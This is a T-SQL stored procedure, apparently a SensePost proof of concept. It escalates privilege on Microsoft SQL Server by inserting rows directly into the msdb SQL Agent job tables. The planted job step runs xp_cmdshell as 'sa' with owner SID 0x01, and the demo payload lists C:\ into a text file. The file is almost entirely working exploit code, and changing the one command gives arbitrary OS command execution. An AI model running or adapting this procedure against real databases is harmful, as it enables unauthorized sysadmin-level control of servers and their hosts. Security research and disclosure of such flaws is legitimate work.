CREATE PROCEDURE sp_eoppoc
AS
BEGIN

  SET NOCOUNT ON

  -- Declare Vars we'll need to calculate
  PRINT '  + Declaring Variables...'
  DECLARE @job_id UNIQUEIDENTIFIER
  DECLARE @originating_server NVARCHAR(30)
  PRINT ''

  -- Set Variables
  PRINT '  + Setting Variables...'
  SELECT @job_id=NEWID()
  SELECT @originating_server= LTRIM(RTRIM(UPPER(CONVERT(NVARCHAR(30), SERVERPROPERTY('ServerName')))))
  PRINT '    + Job_Id: ' + CONVERT(VARCHAR(36), @Job_Id)
  PRINT '    + Server: ' + @originating_server
  PRINT ''

  -- Since we wont have permission to refresh the SQL Agent job cache, we dont create the job first...
  -- We also want to use a commit block in order to lock access to this while we're busy... :)
  PRINT '  + Starting TRANSACTION block'
  BEGIN TRANSACTION SensePost

    -- We start by inserting schedule
    PRINT '  + Inserting into msdb.dbo.sysjobschedules'
    INSERT INTO msdb.dbo.sysjobschedules (job_id, name, enabled, freq_type, freq_interval, freq_subday_type, freq_subday_interval, freq_relative_interval, freq_recurrence_factor, active_start_date, active_end_date, active_start_time, active_end_time, next_run_date, next_run_time)
    VALUES (@job_id, 'SensePost PoC Schedule', 1, 4, 1, 4, 5, 0, 0, 20110202, 99991231, 0, 235959, 0, 0)
    PRINT '    + Rows Affected: ' + LTRIM(RTRIM(CONVERT(VARCHAR(10), @@rowcount)))

    -- Create the job step...
    PRINT '  + Inserting msdb.dbo.sysjobsteps'
    INSERT INTO msdb.dbo.sysjobsteps (job_id, step_id, step_name, subsystem, command, flags, additional_parameters, cmdexec_success_code, on_success_action, on_success_step_id, on_fail_action, on_fail_step_id, server, database_name, database_user_name, retry_attempts, retry_interval, os_run_priority, output_file_name, last_run_outcome, last_run_duration, last_run_retries, last_run_date, last_run_time)
    VALUES(@job_id, 1, 'SensePost PoC Step 1', 'TSQL', 'EXEC master.dbo.xp_cmdshell ''DIR C:\ >> C:\SENSEPOST.TXT''', 0, NULL, 0, 1, 0, 2, 0, NULL, 'master', 'sa', 0, 1, 0, NULL, 0, 0, 0, 0, 0)
    PRINT '    + Rows Affected: ' + LTRIM(RTRIM(CONVERT(VARCHAR(10), @@rowcount)))

    -- Create the target servers
    PRINT '  + Inserting msdb.dbo.sysjobservers'
    INSERT INTO msdb.dbo.sysjobservers (job_id,server_id,last_run_outcome,last_outcome_message,last_run_date,last_run_time,last_run_duration)
    VALUES (@job_id,0,5,NULL,0,0,0)  
    PRINT '    + Rows Affected: ' + LTRIM(RTRIM(CONVERT(VARCHAR(10), @@rowcount)))

    -- Create the job...
    PRINT '  + Inserting msdb.dbo.sysjobs'
    INSERT INTO msdb.dbo.sysjobs(job_id, originating_server, name, enabled, description, start_step_id, category_id, owner_sid, notify_level_eventlog, notify_level_email, notify_level_netsend, notify_level_page, notify_email_operator_id, notify_netsend_operator_id, notify_page_operator_id, delete_level, date_created, date_modified, version_number)
    VALUES (@job_id, @originating_server, N'SensePost PoC', 1, 'SensePost PoC', 1, 0, 0x01, 0, 0, 0, 0, 0, 0, 0, 0, GETDATE(), GETDATE(), 1)
    PRINT '    + Rows Affected: ' + LTRIM(RTRIM(CONVERT(VARCHAR(10), @@rowcount)))

  -- End the TRANSACTION block
  PRINT '  + Committing TRANSACTION block'
  COMMIT TRANSACTION SensePost
  PRINT ''

  -- Thats all folks...
  PRINT '+ All done.'

END
GO
